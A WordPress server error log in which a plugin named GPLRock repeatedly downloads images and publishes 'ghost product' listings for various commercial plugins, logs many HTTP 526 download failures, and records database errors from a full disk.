/home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-16361f70.jpg [02-Apr-2026 12:08:59 UTC] GPLRock: Using pre-downloaded image for product eventon-ticket-variations-options: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-16361f70.jpg [02-Apr-2026 12:08:59 UTC] GPLRock: Ghost product published with image - Product ID: eventon-ticket-variations-options [02-Apr-2026 12:09:01 UTC] GPLRock: Image downloaded successfully for product wordpress-woocommerce-custom-breadcrumbs-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5d12abd1.jpg [02-Apr-2026 12:09:01 UTC] GPLRock: Using pre-downloaded image for product wordpress-woocommerce-custom-breadcrumbs-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5d12abd1.jpg [02-Apr-2026 12:09:01 UTC] GPLRock: Ghost product published with image - Product ID: wordpress-woocommerce-custom-breadcrumbs-plugin [02-Apr-2026 12:09:03 UTC] GPLRock: Image downloaded successfully for product themify-builder-bar-chart (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-568383fe.jpg [02-Apr-2026 12:09:03 UTC] GPLRock: Using pre-downloaded image for product themify-builder-bar-chart: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-568383fe.jpg [02-Apr-2026 12:09:03 UTC] GPLRock: Ghost product published with image - Product ID: themify-builder-bar-chart [02-Apr-2026 12:09:04 UTC] GPLRock: Image downloaded successfully for product stationery-storefront-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2eb23e3f.jpg [02-Apr-2026 12:09:04 UTC] GPLRock: Using pre-downloaded image for product stationery-storefront-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2eb23e3f.jpg [02-Apr-2026 12:09:04 UTC] GPLRock: Ghost product published with image - Product ID: stationery-storefront-woocommerce-theme [02-Apr-2026 12:09:06 UTC] GPLRock: Image downloaded successfully for product wp-rich-snippets-customizer (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-74426233.jpg [02-Apr-2026 12:09:06 UTC] GPLRock: Using pre-downloaded image for product wp-rich-snippets-customizer: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-74426233.jpg [02-Apr-2026 12:09:06 UTC] GPLRock: Ghost product published with image - Product ID: wp-rich-snippets-customizer [02-Apr-2026 12:09:07 UTC] GPLRock: Image downloaded successfully for product facetwp-bookings-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7dfd0602.jpg [02-Apr-2026 12:09:07 UTC] GPLRock: Using pre-downloaded image for product facetwp-bookings-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7dfd0602.jpg [02-Apr-2026 12:09:07 UTC] GPLRock: Ghost product published with image - Product ID: facetwp-bookings-integration [02-Apr-2026 12:09:09 UTC] GPLRock: Image downloaded successfully for product themify-announcement-bar-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8ebb7420.jpg [02-Apr-2026 12:09:09 UTC] GPLRock: Using pre-downloaded image for product themify-announcement-bar-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8ebb7420.jpg [02-Apr-2026 12:09:09 UTC] GPLRock: Ghost product published with image - Product ID: themify-announcement-bar-addon [02-Apr-2026 13:41:04 UTC] GPLRock: Image download failed for product sidebar-widget-manager-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:41:06 UTC] GPLRock: Image download failed for product sidebar-widget-manager-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:41:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sidebar--widget-manager-for-wordpress-17196.webp for product sidebar-widget-manager-for-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 13:41:08 UTC] GPLRock: Image download failed for product sidebar-widget-manager-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:41:10 UTC] GPLRock: Image download failed for product sidebar-widget-manager-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:41:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sidebar--widget-manager-for-wordpress-17196.webp for product sidebar-widget-manager-for-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 13:41:12 UTC] GPLRock WARNING: Image download failed for product sidebar-widget-manager-for-wordpress. URL: https://meldwp.com/wp-content/uploads/sidebar--widget-manager-for-wordpress-17196.webp [02-Apr-2026 13:41:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sidebar-widget-manager-for-wordpress [02-Apr-2026 13:41:12 UTC] GPLRock: Image download failed for product nutrition-facts-label-creator-elementor-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:41:14 UTC] GPLRock: Image download failed for product nutrition-facts-label-creator-elementor-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:41:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nutrition-facts-label-creator-elementor-addon-12725.webp for product nutrition-facts-label-creator-elementor-addon after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 13:41:17 UTC] GPLRock: Image download failed for product nutrition-facts-label-creator-elementor-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:41:19 UTC] GPLRock: Image download failed for product nutrition-facts-label-creator-elementor-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:41:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nutrition-facts-label-creator-elementor-addon-12725.webp for product nutrition-facts-label-creator-elementor-addon after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 13:41:21 UTC] GPLRock WARNING: Image download failed for product nutrition-facts-label-creator-elementor-addon. URL: https://meldwp.com/wp-content/uploads/nutrition-facts-label-creator-elementor-addon-12725.webp [02-Apr-2026 13:41:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nutrition-facts-label-creator-elementor-addon [02-Apr-2026 13:41:21 UTC] GPLRock: Image download failed for product katana-fruits-html5-game (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:41:23 UTC] GPLRock: Image download failed for product katana-fruits-html5-game (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:41:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/katana-fruits---html5-game-31299.webp for product katana-fruits-html5-game after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 13:41:25 UTC] GPLRock: Image download failed for product katana-fruits-html5-game (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:41:27 UTC] GPLRock: Image download failed for product katana-fruits-html5-game (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:41:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/katana-fruits---html5-game-31299.webp for product katana-fruits-html5-game after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 13:41:30 UTC] GPLRock WARNING: Image download failed for product katana-fruits-html5-game. URL: https://meldwp.com/wp-content/uploads/katana-fruits---html5-game-31299.webp [02-Apr-2026 13:41:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: katana-fruits-html5-game [02-Apr-2026 13:41:30 UTC] GPLRock: Image download failed for product kraken-automatic-post-editor-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:41:32 UTC] GPLRock: Image download failed for product kraken-automatic-post-editor-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:41:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kraken-automatic-post-editor-plugin-for-wordpress-10873.webp for product kraken-automatic-post-editor-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 13:41:34 UTC] GPLRock: Image download failed for product kraken-automatic-post-editor-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:41:36 UTC] GPLRock: Image download failed for product kraken-automatic-post-editor-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:41:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kraken-automatic-post-editor-plugin-for-wordpress-10873.webp for product kraken-automatic-post-editor-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 13:41:38 UTC] GPLRock WARNING: Image download failed for product kraken-automatic-post-editor-plugin-for-wordpress. URL: https://meldwp.com/wp-content/uploads/kraken-automatic-post-editor-plugin-for-wordpress-10873.webp [02-Apr-2026 13:41:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kraken-automatic-post-editor-plugin-for-wordpress [02-Apr-2026 13:41:38 UTC] GPLRock: Image download failed for product wordpress-woocommerce-auction-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:41:40 UTC] GPLRock: Image download failed for product wordpress-woocommerce-auction-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:41:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-woocommerce-auction-plugin-17354.webp for product wordpress-woocommerce-auction-plugin after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 13:41:43 UTC] GPLRock: Image download failed for product wordpress-woocommerce-auction-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:41:45 UTC] GPLRock: Image download failed for product wordpress-woocommerce-auction-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:41:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-woocommerce-auction-plugin-17354.webp for product wordpress-woocommerce-auction-plugin after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 13:41:47 UTC] GPLRock WARNING: Image download failed for product wordpress-woocommerce-auction-plugin. URL: https://meldwp.com/wp-content/uploads/wordpress-woocommerce-auction-plugin-17354.webp [02-Apr-2026 13:41:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpress-woocommerce-auction-plugin [02-Apr-2026 13:41:47 UTC] GPLRock: Image download failed for product wordpress-woocommerce-custom-order-prefix-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:41:49 UTC] GPLRock: Image download failed for product wordpress-woocommerce-custom-order-prefix-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:41:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-woocommerce-custom-order-prefix-plugin-15652.webp for product wordpress-woocommerce-custom-order-prefix-plugin after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 13:41:51 UTC] GPLRock: Image download failed for product wordpress-woocommerce-custom-order-prefix-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:41:53 UTC] GPLRock: Image download failed for product wordpress-woocommerce-custom-order-prefix-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:41:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-woocommerce-custom-order-prefix-plugin-15652.webp for product wordpress-woocommerce-custom-order-prefix-plugin after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 13:41:55 UTC] GPLRock WARNING: Image download failed for product wordpress-woocommerce-custom-order-prefix-plugin. URL: https://meldwp.com/wp-content/uploads/wordpress-woocommerce-custom-order-prefix-plugin-15652.webp [02-Apr-2026 13:41:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpress-woocommerce-custom-order-prefix-plugin [02-Apr-2026 13:41:56 UTC] GPLRock: Image download failed for product yacht-and-boat-rental-wordpress-booking-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:41:58 UTC] GPLRock: Image download failed for product yacht-and-boat-rental-wordpress-booking-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:42:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/yacht-and-boat-rental---wordpress-booking-plugin-1200.webp for product yacht-and-boat-rental-wordpress-booking-plugin after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 13:42:00 UTC] GPLRock: Image download failed for product yacht-and-boat-rental-wordpress-booking-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:42:02 UTC] GPLRock: Image download failed for product yacht-and-boat-rental-wordpress-booking-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:42:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/yacht-and-boat-rental---wordpress-booking-plugin-1200.webp for product yacht-and-boat-rental-wordpress-booking-plugin after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 13:42:04 UTC] GPLRock WARNING: Image download failed for product yacht-and-boat-rental-wordpress-booking-plugin. URL: https://meldwp.com/wp-content/uploads/yacht-and-boat-rental---wordpress-booking-plugin-1200.webp [02-Apr-2026 13:42:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: yacht-and-boat-rental-wordpress-booking-plugin [02-Apr-2026 13:42:04 UTC] GPLRock: Image download failed for product vertical-ultimate-3d-carousel-wordpress-woocommerce-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:42:06 UTC] GPLRock: Image download failed for product vertical-ultimate-3d-carousel-wordpress-woocommerce-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:42:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vertical-ultimate-3d-carousel-wordpress--woocommerce-plugin-2814.webp for product vertical-ultimate-3d-carousel-wordpress-woocommerce-plugin after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 13:42:09 UTC] GPLRock: Image download failed for product vertical-ultimate-3d-carousel-wordpress-woocommerce-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:42:11 UTC] GPLRock: Image download failed for product vertical-ultimate-3d-carousel-wordpress-woocommerce-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:42:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vertical-ultimate-3d-carousel-wordpress--woocommerce-plugin-2814.webp for product vertical-ultimate-3d-carousel-wordpress-woocommerce-plugin after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 13:42:13 UTC] GPLRock WARNING: Image download failed for product vertical-ultimate-3d-carousel-wordpress-woocommerce-plugin. URL: https://meldwp.com/wp-content/uploads/vertical-ultimate-3d-carousel-wordpress--woocommerce-plugin-2814.webp [02-Apr-2026 13:42:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: vertical-ultimate-3d-carousel-wordpress-woocommerce-plugin [02-Apr-2026 13:42:13 UTC] GPLRock: Image download failed for product header-blocks-for-elementor-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:42:15 UTC] GPLRock: Image download failed for product header-blocks-for-elementor-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:42:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/header-blocks-for-elementor---wordpress-plugin-27882.webp for product header-blocks-for-elementor-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 13:42:17 UTC] GPLRock: Image download failed for product header-blocks-for-elementor-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:42:19 UTC] GPLRock: Image download failed for product header-blocks-for-elementor-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:42:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/header-blocks-for-elementor---wordpress-plugin-27882.webp for product header-blocks-for-elementor-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 13:42:22 UTC] GPLRock WARNING: Image download failed for product header-blocks-for-elementor-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/header-blocks-for-elementor---wordpress-plugin-27882.webp [02-Apr-2026 13:42:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: header-blocks-for-elementor-wordpress-plugin [02-Apr-2026 13:42:22 UTC] GPLRock: Image download failed for product image-caption-hover-effects (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:42:24 UTC] GPLRock: Image download failed for product image-caption-hover-effects (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:42:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/image-caption-hover-effects-32503.webp for product image-caption-hover-effects after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 13:42:26 UTC] GPLRock: Image download failed for product image-caption-hover-effects (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 13:42:28 UTC] GPLRock: Image download failed for product image-caption-hover-effects (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 16:16:38 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-6d7ec7-4152.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 16:18:39 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-6d8a84-27388.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 16:18:40 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-6d8a84-2738a.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by wp_reschedule_event, wp_schedule_event, _set_cron_array, update_option [02-Apr-2026 16:18:40 UTC] Cron reschedule event error for hook: wp_privacy_delete_old_export_files, Error code: could_not_set, Error message: The cron event list could not be saved., Data: {"schedule":"hourly","args":[],"interval":3600} [02-Apr-2026 16:18:40 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-6d8a84-2738b.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by wp_unschedule_event, _set_cron_array, update_option [02-Apr-2026 16:18:40 UTC] Cron unschedule event error for hook: wp_privacy_delete_old_export_files, Error code: could_not_set, Error message: The cron event list could not be saved., Data: {"schedule":"hourly","args":[],"interval":3600} [02-Apr-2026 16:18:40 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-6d8a84-2738c.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by delete_transient, delete_option [02-Apr-2026 16:20:39 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-6d9897-25dfb.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 16:22:42 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-6da858-424e.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 17:54:55 UTC] GPLRock: Image download failed for product ultimate-reviewer-elementor-wpbakery-page-builder-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:54:57 UTC] GPLRock: Image download failed for product ultimate-reviewer-elementor-wpbakery-page-builder-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:55:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ultimate-reviewer---elementor--wpbakery-page-builder-addon-12717.webp for product ultimate-reviewer-elementor-wpbakery-page-builder-addon after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 17:55:00 UTC] GPLRock: Image download failed for product ultimate-reviewer-elementor-wpbakery-page-builder-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:55:02 UTC] GPLRock: Image download failed for product ultimate-reviewer-elementor-wpbakery-page-builder-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:55:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ultimate-reviewer---elementor--wpbakery-page-builder-addon-12717.webp for product ultimate-reviewer-elementor-wpbakery-page-builder-addon after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 17:55:04 UTC] GPLRock WARNING: Image download failed for product ultimate-reviewer-elementor-wpbakery-page-builder-addon. URL: https://meldwp.com/wp-content/uploads/ultimate-reviewer---elementor--wpbakery-page-builder-addon-12717.webp [02-Apr-2026 17:55:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ultimate-reviewer-elementor-wpbakery-page-builder-addon [02-Apr-2026 17:55:04 UTC] GPLRock: Image download failed for product multi-page-forms-for-nex-forms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:55:06 UTC] GPLRock: Image download failed for product multi-page-forms-for-nex-forms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:55:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/multi-page-forms-for-nex-forms-806.webp for product multi-page-forms-for-nex-forms after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 17:55:08 UTC] GPLRock: Image download failed for product multi-page-forms-for-nex-forms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:55:11 UTC] GPLRock: Image download failed for product multi-page-forms-for-nex-forms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:55:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/multi-page-forms-for-nex-forms-806.webp for product multi-page-forms-for-nex-forms after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 17:55:13 UTC] GPLRock WARNING: Image download failed for product multi-page-forms-for-nex-forms. URL: https://meldwp.com/wp-content/uploads/multi-page-forms-for-nex-forms-806.webp [02-Apr-2026 17:55:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: multi-page-forms-for-nex-forms [02-Apr-2026 17:55:13 UTC] GPLRock: Image download failed for product news-revolution-layouts-for-elementor-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:55:15 UTC] GPLRock: Image download failed for product news-revolution-layouts-for-elementor-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:55:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/news-revolution-layouts-for-elementor-wordpress-plugin-874.webp for product news-revolution-layouts-for-elementor-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 17:55:17 UTC] GPLRock: Image download failed for product news-revolution-layouts-for-elementor-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:55:19 UTC] GPLRock: Image download failed for product news-revolution-layouts-for-elementor-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:55:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/news-revolution-layouts-for-elementor-wordpress-plugin-874.webp for product news-revolution-layouts-for-elementor-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 17:55:21 UTC] GPLRock WARNING: Image download failed for product news-revolution-layouts-for-elementor-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/news-revolution-layouts-for-elementor-wordpress-plugin-874.webp [02-Apr-2026 17:55:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: news-revolution-layouts-for-elementor-wordpress-plugin [02-Apr-2026 17:55:22 UTC] GPLRock: Image download failed for product hospital-hospital-management-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:55:24 UTC] GPLRock: Image download failed for product hospital-hospital-management-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:55:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hospital--hospital-management-system-20655.webp for product hospital-hospital-management-system after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 17:55:26 UTC] GPLRock: Image download failed for product hospital-hospital-management-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:55:28 UTC] GPLRock: Image download failed for product hospital-hospital-management-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:55:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hospital--hospital-management-system-20655.webp for product hospital-hospital-management-system after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 17:55:30 UTC] GPLRock WARNING: Image download failed for product hospital-hospital-management-system. URL: https://meldwp.com/wp-content/uploads/hospital--hospital-management-system-20655.webp [02-Apr-2026 17:55:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hospital-hospital-management-system [02-Apr-2026 17:55:30 UTC] GPLRock: Image download failed for product zigaform-php-form-builder-contact-survey (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:55:32 UTC] GPLRock: Image download failed for product zigaform-php-form-builder-contact-survey (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:55:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zigaform---php-form-builder---contact--survey-4522.webp for product zigaform-php-form-builder-contact-survey after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 17:55:35 UTC] GPLRock: Image download failed for product zigaform-php-form-builder-contact-survey (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:55:37 UTC] GPLRock: Image download failed for product zigaform-php-form-builder-contact-survey (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:55:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zigaform---php-form-builder---contact--survey-4522.webp for product zigaform-php-form-builder-contact-survey after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 17:55:39 UTC] GPLRock WARNING: Image download failed for product zigaform-php-form-builder-contact-survey. URL: https://meldwp.com/wp-content/uploads/zigaform---php-form-builder---contact--survey-4522.webp [02-Apr-2026 17:55:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: zigaform-php-form-builder-contact-survey [02-Apr-2026 17:55:39 UTC] GPLRock: Image download failed for product recent-posts-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:55:41 UTC] GPLRock: Image download failed for product recent-posts-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:55:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/recent-posts-for-elementor-22005.webp for product recent-posts-for-elementor after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 17:55:43 UTC] GPLRock: Image download failed for product recent-posts-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:55:45 UTC] GPLRock: Image download failed for product recent-posts-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:55:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/recent-posts-for-elementor-22005.webp for product recent-posts-for-elementor after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 17:55:47 UTC] GPLRock WARNING: Image download failed for product recent-posts-for-elementor. URL: https://meldwp.com/wp-content/uploads/recent-posts-for-elementor-22005.webp [02-Apr-2026 17:55:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: recent-posts-for-elementor [02-Apr-2026 17:55:48 UTC] GPLRock: Image download failed for product masterstudy-lms-mobile-app-flutter-v3-ios-android (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:55:50 UTC] GPLRock: Image download failed for product masterstudy-lms-mobile-app-flutter-v3-ios-android (attempt 2/3). HTTP 